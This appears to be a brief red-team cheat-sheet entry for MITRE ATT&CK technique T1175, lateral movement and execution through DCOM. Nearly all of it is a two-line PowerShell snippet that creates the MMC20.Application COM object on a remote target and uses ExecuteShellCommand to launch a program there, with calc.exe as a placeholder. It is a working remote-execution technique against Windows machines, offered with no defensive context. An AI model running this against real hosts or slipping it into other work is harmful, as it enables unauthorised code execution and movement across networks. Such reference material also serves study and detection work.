Component Object Model and Distributed COM
ID: T1175 Tactic: Lateral Movement, Execution
DCOM
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET IP"))
$com.Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\Calc.exe",$null,$null,"7")
Last updated